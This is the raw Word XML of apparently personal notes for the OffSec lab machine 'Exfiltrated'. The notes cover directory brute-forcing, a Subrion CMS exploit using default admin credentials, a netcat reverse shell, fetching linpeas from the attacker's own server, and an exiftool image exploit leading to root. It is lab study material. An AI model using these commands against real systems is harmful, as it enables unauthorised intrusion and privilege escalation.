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69D7794E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BA6B4E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exfiltrated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024DDF20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  <w:r w:rsidR="00765100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03A31448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BA6B4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5E7C45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BA6B4E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BA6B4E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BA6B4E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BA6B4E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BA6B4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A6B4E"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79E5824" w14:textId="66223128" w:rsidR="00E747B6" w:rsidRDefault="00E747B6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dirb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hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00510F11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://t_ip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-f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3C0ED1" w14:textId="4B88BFE7" w:rsidR="00594495" w:rsidRDefault="00594495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exfirtrated.offsec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add to the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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/hosts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1FC1890B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dirb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hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00510F11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://exfiltrated.offsec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-f = visit it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB32C08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see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subrion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CMS exploit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github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AAD2239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on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dirb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we see robots.txt = visit this page where we notice the /panel so visit it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F06AD16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chmod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+x subrionRCE.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2B10AA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subrionRCE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htpp://exfiltrated.offsec/panel/ -l admin -p admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152B2459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a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E34F6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which python = we notice non</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E297E9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open reverse shell generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA979E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select python3#2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4DA297E7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terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA47F7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start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netcat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with 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C97C0C6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from past shell paste the reverse shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB3116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and we obtain shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12270BEF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python3 -c ‘import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pty;pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F019BB9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ls -al = we see 2 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phar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files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0087B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linpeas.sh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github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copy it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111255B1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terminal = nano linpeas.sh = paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E1649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python3 -m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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25599DBA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04ACAD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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20616D53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wget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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00510F11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://our-ip:8000/linpeas.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54ABC206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ls -al = we notice the file was uploaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3F34D9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chmod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+x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDB4C68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./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0F4159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notice the file = /opt/image-exif.sh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D0C2C4B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it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270BF378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see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vr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/www/html/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subrion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/uploads = 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exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1087FB3E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it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE3949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exiftool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github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esploitdb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has file so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diwonlaod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it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA89576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sent to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bhavya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where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http.server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is started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7AB7F1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same terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EF7DDB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notice in the file that how its run so try it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BC0436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python3 50911.py -s t-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4141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFA7AAA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response with image.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50408693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past shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5677A5CB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wget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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00510F11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://our_ip:8000/image.jpg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= at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subrion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47204845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in the website we notice the image was added</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C814BA5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when we open it then we obtain the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473FC4D8" w14:textId="77777777" w:rsidR="00765100" w:rsidRDefault="00765100" w:rsidP="007651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its root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72E0CEEC" w:rsidR="00843DCE" w:rsidRDefault="0076510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on desktop we notice proof.txt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03E79"/>
    <w:rsid w:val="00031AE4"/>
    <w:rsid w:val="00064887"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000F5B2C"/>
    <w:rsid w:val="00197D2C"/>
    <w:rsid w:val="00287A36"/>
    <w:rsid w:val="002D31DC"/>
    <w:rsid w:val="003A08B8"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00462F9F"/>
    <w:rsid w:val="004C2582"/>
    <w:rsid w:val="004D14FF"/>
    <w:rsid w:val="004F538E"/>
    <w:rsid w:val="00504E30"/>
    <w:rsid w:val="00594495"/>
    <w:rsid w:val="005E7C45"/>
    <w:rsid w:val="006F3315"/>
    <w:rsid w:val="00765100"/>
    <w:rsid w:val="00810380"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="0084413B"/>
    <w:rsid w:val="0085224C"/>
    <w:rsid w:val="008C09FA"/>
    <w:rsid w:val="009C0C0F"/>
    <w:rsid w:val="00A3057A"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00B64A4B"/>
    <w:rsid w:val="00BA6B4E"/>
    <w:rsid w:val="00C166EA"/>
    <w:rsid w:val="00C45EE1"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00E04E15"/>
    <w:rsid w:val="00E27C9F"/>
    <w:rsid w:val="00E747B6"/>
    <w:rsid w:val="00EB72AD"/>
    <w:rsid w:val="00F00884"/>
    <w:rsid w:val="00F153B9"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F61D0B"/>
    <w:rsid w:val="00F8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47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our_ip:8000/image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our-ip:8000/linpeas.sh" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://exfiltrated.offsec" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://t_i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34</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-30T16:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>